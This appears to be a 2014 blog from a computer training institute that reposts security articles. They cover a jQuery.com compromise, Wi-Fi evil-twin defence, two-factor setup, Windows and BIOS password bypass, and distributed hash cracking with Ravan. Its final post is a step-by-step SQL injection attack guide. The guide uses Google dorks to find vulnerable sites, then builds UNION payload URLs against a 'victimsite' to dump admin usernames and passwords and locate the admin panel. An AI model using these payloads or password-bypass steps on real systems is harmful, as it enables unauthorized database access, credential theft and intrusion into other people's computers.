Wednesday, October 8, 2014

Future vision computer Institute offers Professional web Designing & development course in SURAT

Future vision computer Institute offers Professional web Designing & development course in SURAT, For Best Training in wordpress, SEO,Graphic Desining, programming and accounting join only future vision Institute. Call 9825771678

http://futurevisioncomputers.com

Friday, September 26, 2014

jQuery.com reportedly hacked to serve malware

jQuery.com reportedly hacked to serve malware

- See more at: http://www.ehackingnews.com/2014/09/jquerycom-reportedly-hacked-to-serve.html#sthash.7XRJBetY.dpuf

JQuery.com, the official website of the popular javascript library JQuery(used by nearly 70% of top 10,000 websites), had reportedly been compromised and had served credential stealing malware. 
Sponsored Links
RiskIQ announced that they had detected a malicious script in jquery.com that redirects visitors to a website hosting the RIG Exploit kit.

The redirector domain(jquery-cdn[dot]com) used in this attack has been registered on September 18, the same day on which the attack was detected by RiskIQ.  RiskIQ believes that this domain was intended specifically to blend into the website.

The good news is that RiskIQ found no indication suggesting that the JQuery library itself has been affected.  Otherwise, many additional websites using the JQuery CDN to load the JQuery library would also have been affected.

The people at JQuery.com says they found no logs or evidence that their server was compromised.

"So far the investigation has been unable to reproduce or confirm that our servers were compromised. We have not been notified by any other security firm or users of jquery.com confirming a compromise." JQuery.com blog post reads.
http://futurevisioncomputers.com

How to Recover Windows 7 Password~Windows Password Killer Tool

How to Recover Windows 7 Password~Windows Password Killer Tool


I have explained how to recover the lost password usingBacktrack Password Cracking. Here i am going to introduce a new tool named as Windows Password Killer. It enables you remove windows 7 password to reset the administrator, standard user and guest passwords easily without any data losing or file damage.

There is 3 different editions - the Lite, Pro and Ultimate, here we take the Pro edition as an example for the password remove process with USB drive (CD/DVD also supported too).

Requirements:
1. Any Accessible Computer.
2.USB Drive or CD/DVD

Step 1: Install Password Killer
Download the Windows Windows Password Killer from Here. 
Install the windows Password Killer in your friends or any accssible computer.
Step 2:Burn a bootable CD/DVD or an USB drive
  1. Insert the USB Drive or CD/DVD.
  2. Run the Windows Password Killer.
  3. Select the USB drive or CD/DVD.
  4. click the Create button.
  5. It will ask you to verify whether you select correct disk or not. Click "Yes" button.

Step 3: Boot from USB Drive OR CD/DVD 
Now let us come to our locked computer.
  • Insert your USB Drive before turn on the system(if you are using CD/DVD, you have to turn on and insert). 
  • Now turn on the system, press F10 or F12(it may vary for your system) to choose the booting device. 
  • Select the USB drive or CD/DVD.
It will boot into Windows Password Killer.

Step4 : Reseting Password
After program starts, select Windows 7 system on the start page, click 'Next'.




Select your target user accounts, and then click 'Next' to proceed the Windows 7 password recovery/unlock process.


The Windows 7 Administrator password or other user accounts password is reset successfully now. Take out the password reset CD/DVD, click 'Reboot' to restart your computer.

Enjoy.!!



http://futurevisioncomputers.com

How to crack or Reset BIOS Password? ~Cracking Tutorials

How to crack or Reset BIOS Password? ~Cracking Tutorials


The BIOS software is built into the PC, and is the first code run by a PC when powered on ('boot firmware'). The primary function of the BIOS is to set up the hardware and load and start a boot loader. When the PC starts up, the first job for the BIOS is to initialize and identify system devices such as the video display card, keyboard and mouse, hard disk drive, optical disc drive and other hardware. The BIOS then locates software held on a peripheral device (designated as a 'boot device'), such as a hard disk or a CD/DVD, and loads and executes that software, giving it control of the PC. This process is known as booting, or booting up, which is short for bootstrapping.
Bios password is usually used to protect the user's BIOS settings on the computer. If you want to reset the password on the BIOS does not need to bother to connect bateray CMOSnya, with a little trick on the Dos you can reset the BIOS password on it in 2 ways:

1. Clear CMOS
This way I consider the most ancient and most easy to break down the password on the BIOS. The steps are easy, first open the casing cover computer CPU. Then find the bios battery that looks something like the battery just a little more big clock. After the meet and consider the area around the battery there is usually a jumper with 3 pins, 2 pins and 1 pin not connected.

Suppose the three pins with the code 1 - 2 - 3. Connector that connects the initial position usually is 2-3. To reset the bios do I move the position of the plug that connects pins 2-3 to position 1-2 for about 5 seconds. Then plug it back into the starting position (2-3). Try restarting the computer back on, secured the bios password is gone.

If the above looks complicated, is easy to clear cmos by unplugging the BIOS battery and then put it back. But with the consequences of removing the label is the warranty on the battery BIOS.

2. Through DOS 

First out of the windows with me restart your computer, start the computer in MS-DOS mode, use the option "Command Prompt Only"

At c: prompt, type: DEBUG
press enter. You will see the sign (-) at the DEBUG prompt, then type:
o 70 2e
at the DEBUG prompt will be displayed as-o 70 2e.
press enter and type:
-O 71 ff
press enter, the last type:
Q
hit enter, then you will get out of the DEBUG prompt and return to the C:> prompt.
Now restart your COMPUTER, and see the results 

http://futurevisioncomputers.com

How to Use Ravan for Password Cracking?

How to Use Ravan for Password Cracking?


In my previous article, i explained about the Ravan Tool.  Now let us see how to use the Ravan for cracking passwords.


Requriments:
Lot of Friends :
Ravan is Distributed password cracking method. So you will need lot of friends who have Pc with Internet connection. The speed of cracking will increase based on the number of pc contribute in the cracking.

How to use Ravan?

Step1:
  • Go to http://www.andlabs.org/tools/ravan.html
  • Enter the value of the hash that must be cracked
  • Enter the value of the salt, if it is not a salted hash then leave it blank
  • Enter the charset. Only these characters will be use in the brute force attack
  • Select the hashing algorithm (MD5, SHA1, SHA256, SHA512)
  • Select the position of the salt. (clear-text+salt or salt+clear-text)
  • Hit ‘Submit Hash’
Step 2:
 If hash is successfully submitted, it would return a URL.  Now you just need to send this URL to all your friends and ask them to click the start button.

    The main page manages the cracking so it must not be closed or the cracking would fail.

That is it. Once your friends click start they would be doing pieces of the work and submitting results back.


The main page would constantly monitor the progress of the cracking process and manage it across all the workers. You would be able to see the stats throughout the process, once the hash is cracked the clear-text value is displayed.


http://futurevisioncomputers.com

Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend

Evil Twin and Fake Wireless Access Point Hacks: What They Are, How To Defend



Hacking is a term with a wide variety of acts associated with it. Some are incredibly complex and demand a high degree of knowledge, others are little more than installing some software on your device and acting a bit...less than ethically.

One of the most common hacks is also one of the easiest to defend against. This is what is known as a fake wireless access point. Hackers use this tactic to easily steal data of unsuspecting wireless users in public places.

What is a fake wireless access point data theft?
This type of attack has a number of nicknames associated with it: AP Phishing, Wi-Fi Phishing, Hotspotter, Evil Twins, and Honeypot AP. All of these are associated with creating a fake Wi-Fi connection that people log into, and whose goal is to steal credentials, logins, and passwords.

To accomplish this, hackers simply use a piece of software, or app, that is designed to capture data that is sent over a wireless connection. Examples of software that is sued during a fake Wi-Fi attack includes:

  • AirSSL
  • AirJack
  • Airsnarf
  • Dsniff
  • Cain
  • void11

No matter which apps are used, the key to it all is setting up a wireless connection that people will want to connect to. When they go to connect to the wireless point they likely won’t suspect a thing. Why? Because this tactic is used most often in public areas.

If you were to go into your local Starbucks, sit down with your mochalatte venti with cream and sugar pumpkin spice, and open up your tablet, finding a connection labelled ‘Starbucks Free WiFi,’ you’d probably connect in a heartbeat (on which is quicken by caffeine, at that). The same goes if you’re on a layover at JFK and you see a connection labelled ‘JFK Free Wi-Fi.- You wouldn’t think twice. That’s what the hackers are counting on - you not thinking.

How is your data stolen during a fake wireless access point theft?
How your most important data is stolen is a little shocking - you give it to them. A large percentage of these hacks take place with a fake wireless point that requires a login and password. Once that information is put into the login, hackers will take it and use it to sign into popular websites, assuming that you use the same login and password for multiple sites.

When your online accounts start showing charges that you didn’t initiate, or if your social media account is taken over, you could be the victim of a fake wireless access point data theft.

How to defend against an ‘Evil Twin’ attack?
There are a number of ways to defend against it, I’ll look at some easy to understand examples:
  • The best defence is to always verify with the wifi provider. Ask the Starbucks staff what their wi-fi is called, it can save you a massive headache. Always remember - if a deal seems too good to be true, like free wifi, it probably is.
  • Use different login details and passwords for public wifi.
  • Disconnect auto-connect when you’re in unfamiliar territory.
  • Be cautious when connects suddenly disconnect, especially if it happens for everyone on the network. An app known as aireplay is capable of disconnecting users from wifi, hoping that they’ll reconnect to their fake wifi.
  • Be cautious of certificates. Good websites can occasionally send you one, but if this happens over a public wifi that you don’t know, it is best to back off.
  • If a wifi hotspot is interfering with your VPN, forcing you to shut it down, that is a HUGE red flag. A VPN is a great defence against this attack, and hackers know it. Forcing your VPN to disable when you’re trying to connect is the only way that they can steal your data.
That last point is one I want to look at further. A VPN can be a great defence against this type of attack because it encrypts all of the data that you send out. With this data being encrypted, even when you create your login and password with the fake wifi, your data can not be stolen because it can not be deciphered. We review our Top 10 VPNs over on our website if you’re interested in learning more about them.

A last option that I’ll suggest is using SSL-protected apps. These do take more care and thought to use, but they will offer you protection that is similar to a VPN. Some hackers have even found a wayaround SSL protection ( the BREACH method), so you may want to explore using this with a secondary defensive measure.

The overall advice is to be cautious and verify before you connect. People look at me weird all the time when I ask for the correct wifi name that I should use to connect to. I’ve never been the victim of an ‘Evil Twin’ attack...I’ll take a funny look or two!

http://futurevisioncomputers.com

6 Web Security Risks of Not Monitoring Internet Activity

6 Web Security Risks of Not Monitoring Internet Activity


web security tips

Internet access is one of the most important things you can provide to your users. It’s a morale booster, it helps them do their job (for some it is even a vital component of their job,) it enables them to find solutions to problems, research the competition, find new customers, and more. But Internet access comes with a host of threats and if you are not on top of your web security game, allowing your users to have Internet access may cause just as many problems as it can solve. If you are going to provide your users Internet access, consider these top six web security risks of not monitoring Internet activity, and deploy a web security solution to make sure you don’t regret the generosity to your users.

1. Malware
Whether your users download infected files or they just visit compromised websites, malware infections are the single biggest risk to your users from Internet access. Web security applications can scan all files for malware and block access to known infected sites. They can also filter out malicious scripts embedded in web pages, providing strong protection against malware for your users.

2. Phishing
Phishing attacks not only put your users at risk, they can have significant and long lasting impact to your customers, your financials, and your reputation. As much as we raise awareness of phishing attacks, you can read about a new business falling victim almost weekly. Web security software can completely block access to known phishing sites, so even if your users do fall for a phishing email, they cannot submit sensitive information to the attacker’s website.

3. Copyright infringement
Even the best intentions can lead to costly impact to your business, and when users download audio and video files without obtaining the rights to them, the copyright holders can go after your business for compensation. Web security software can block the download of media files, or can filter access based on category to help prevent users from downloading content that might cost you in the long term.

4. Licensing violations
Audio and video are not the only ways a user’s actions can lead to fines and penalties. When users download and install software without obtaining a license for it, the company can be held liable as well. Sites that host cracked software, keygens, and other warez can be blocked completely using web security software, so you can exercise due diligence and avoid a run-in with the Business Software Alliance or other licensing issue.

5. Human Resources incidents
What’s appropriate to access at work and what users may be accustomed to accessing at home are often at opposite ends of the content spectrum, and it’s easy for a user to be offended, or even feel harassed, if exposed to content another user is accessing. This leads to workplace problems including morale issues, teamwork challenges, and can quickly escalate to an incident that involves HR and could lead to someone losing their job. You can avoid all of that by using web security software to block access to content inappropriate for the workplace, and to enforce safe search results in the major search engines.

6. Bandwidth consumption
Media sites such as YouTube, Netflix, Hulu, Pandora, Internet radio and television streaming sites, and others are great for when you are at home, but if only a handful of your users decide to start listening to their favorite music feed, or surreptitiously watching a movie while they should be working, you can quickly find your network without enough bandwidth to support the business critical applications like email. Web security software can block access to the non-business critical sites, and throttle bandwidth consumption for the sites you do want to allow, to ensure there is enough available for what your network really needs.

7. Wasting time
How often has a “quick” web search or social media check-in caused you to lose track of time? Now multiply that by the number of users on your network, who will do exactly the same thing, and you can quickly see how you can lose hours of productivity each day. Web security software can block access to social media sites, but the best products can instead simply limit the amount of total time or the time frames when users can use the web for recreational purposes. A few minutes here and there is a perfectly good way to ensure morale doesn’t suffer, and if a user wants to spend their lunch break updating their wall…what’s the harm in that, as long as they get back to work at the end of their lunch?

So don’t think web access without addressing web security. Web security applications can monitor access, filter out malware, block access to phishing sites or repositories, prevent the download of files that might contain copyrighted material, restrict the amount of bandwidth burned on streaming media, and even keep users from wasting time on social media sites. Web security applications are a critical component of your Internet security, and help to ensure that Internet access is a benefit, and not a risk to your company.


http://futurevisioncomputers.com

what is Blackhat SEO poisoning attacks ?

Blackhat SEO poisoning attacks




Recently , i have reported that Google Image search and Bing Image search leads to malware sites especially a blackhole exploit kit page. The reason behind this attack is SEO Poisoning.

What is SEO?
Search engine optimization (SEO) is a collection of techniques to improve the visibility of a website in a search engine's search results. Some of the techniques used by webmasters in

What is BlackHat SEO?

Black Hat SEO , also known as SEO poisoning, is a illegal-technique used by cyber criminals to make their links appear higher than legitimate results. When a user search for related keywords, the infected links appear in the top of the search results

Hacker use one of the following techniques:

*Creating SEO-friendly fake pages related to poplar search topics on  compromised sites
*Cloak malicious content from sphiders and security researchers.
* Iframe injection

Poisoning Image search Results:
As most of search engines filter and find the text-based seo poisoning attacks, Cyber criminals now poisoning the Image search results instead.

They hacked legitimate sites and inject malicoius code.  Whenever a person click the Image of compromised site in the search result , it will redirect him to malware sites.  Sophos reports that bing image-search results are being poisoned more than other search engines.


Share This Article on Twitter/Facebook/Blog/Forum or Anywhere:


http://futurevisioncomputers.com

How to enable Two-Factor authentication in Linkedin?

How to enable Two-Factor authentication in Linkedin?


I'm very glad to hear the Linkedin is the latest company that boosts the security with the Two-Factor authentication. Few days back, Twitter enabled the two-step verification to thwart hackers.

Are you searching for the guide to configure the 2-step authentication? You are at right place.  Here is the guide that will help you to configure the linkedin two-step verification .

Before getting into the actual steps, let me explain what 2-step auth is.

Two-Step Verification:
A security feature that prompts you to enter a temporary secret number sent to your phone whenever you log into your account.

Why you should enable this feature?
I believe this is best security feature.  Let us assume, someone has stolen your login credentials via keylogger or phishing or any other method.  If the hacker try to log into the website with your credentials, he will asked to provide the secret number sent to your mobile.  Fortunately, you have your mobile with you ;) .  So hacker can't log in to your account.  Also you will come to know that someone is trying to access your account. 
 
How to configure the Linkedin Two-factor authentication?

Step1: 
Login to your account and go to the settings page:

https://www.linkedin.com/settings/ 

Step 2:
select the "Account" tab and click the " Manage security settings " option.


Step 3: 
Now Here , you can see the "Two-step verification for sign in " option and it displays the feature is currently "off".  To turn on the feature , simply click the "Turn on" link.



In next step, you will be asked to enter your phone number.



Step4 : 



Once you enter the phone number, you will receive a security code.  After entering the security code sent to your mobile number, the feature will be turned on.  Hurrah, Now you are protected :)


Next time, when you try to log in, you will be asked to provide the secret code :)

Share This Article on Twitter/Facebook/Blog/Forum or Anywhere:


http://futurevisioncomputers.com

Penetration Testing Tutorials | Learn Ethical Hacking

Hacking website using SQL Injection -step by step guide


What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?

* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=

Here is the huge list of Google Dork
http://www.futurevisioncomputers.com/download/13161874/A...t.zip.html

Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.




Note:if you like to hack particular website,then try this:
site:www.victimsite.com dork_list_commands
for eg:
site:www.futurevisioncomputers.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:
http://www.futurevisioncomputers.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1
http://www.futurevisioncomputers.com/index.php?id=2 order by 2
http://www.futurevisioncomputers.com/index.php?id=2 order by 3
http://www.futurevisioncomputers.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number,then no of column is "x-1".

I mean:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1(noerror)
http://www.futurevisioncomputers.com/index.php?id=2 order by 2(noerror)
http://www.victimsite.com/index.php?id=2 order by 3(noerror)
http://www.victimsite.com/index.php?id=2 order by 4(noerror)
http://www.victimsite.com/index.php?id=2 order by 5(noerror)
http://www.victimsite.com/index.php?id=2 order by 6(noerror)
http://www.victimsite.com/index.php?id=2 order by 7(noerror)
http://www.victimsite.com/index.php?id=2 order by 8(error)

 so now x=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.futurevisioncomputers.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.futurevisioncomputers.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5: Finding version,database,user
Replace the 3 from the query with "version()"

For eg:
http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.futurevisioncomputers.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.futurevisioncomputers.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we got luck, then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls. or you can some kind of admin finder tools.
http://futurevisioncomputers.com